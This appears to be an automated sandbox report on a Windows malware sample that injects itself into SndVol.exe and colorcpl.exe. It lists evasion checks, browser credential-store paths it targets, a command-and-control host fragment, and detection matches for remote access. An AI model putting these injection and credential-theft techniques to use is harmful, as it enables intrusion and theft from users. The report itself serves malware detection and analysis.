                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040F6F5 Sleep,ExitProcess,
                    Source: C:\Windows\SysWOW64\SndVol.exe TID: 7160Thread sleep time: -79500s >= -30000s
                    Source: C:\Windows\SysWOW64\SndVol.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI call chain: ExitProcess graph end node
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.00000000005C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.0000000000602000.00000004.00000020.00020000.00000000.sdmp, Fnvtdhen.PIF, 00000002.00000002.253289545.0000000000616000.00000004.00000020.00020000.00000000.sdmp, Fnvtdhen.PIF, 00000002.00000002.253289545.0000000000606000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.00000000005F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWevawe.ydns.eu/
                    Source: SndVol.exe, 00000001.00000003.216691336.000000000083A000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000001.00000003.352563567.000000000083A000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000001.00000003.216644931.000000000083A000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000001.00000002.474404070.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041C1E3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0044E749 FindFirstFileExA,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040783C FindFirstFileW,FindNextFileW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00419A47 FindFirstFileW,FindNextFileW,FindNextFileW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00443224 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043494B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0044FA9E GetProcessHeap,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00434A99 SetUnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043494B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043BA72 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00434F4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 62F0000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6190000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 62F0000 value starts with: 4D5A
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6190000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 62F0000
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6190000
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00419579 mouse_event,
                    Source: SndVol.exe, 00000001.00000003.352563567.000000000083A000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000001.00000002.474404070.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: SndVol.exe, 00000001.00000002.474404070.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers.eu:1972=L
                    Source: SndVol.exe, 00000001.00000003.352563567.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr]
                    Source: SndVol.exe, 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000001.00000002.474404070.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: SndVol.exe, 00000001.00000002.474404070.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
                    Source: SndVol.exe, 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, logs.dat.1.drBinary or memory string: [Program Manager]
                    Source: SndVol.exe, 00000001.00000002.474404070.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4L
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00434BC1 cpuid
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB91F0 GetLocalTime,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00449060 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041B55F GetUserNameW,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CBB770 GetVersionExA,

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253206056.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253042102.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253092372.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253076423.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253206056.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253042102.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
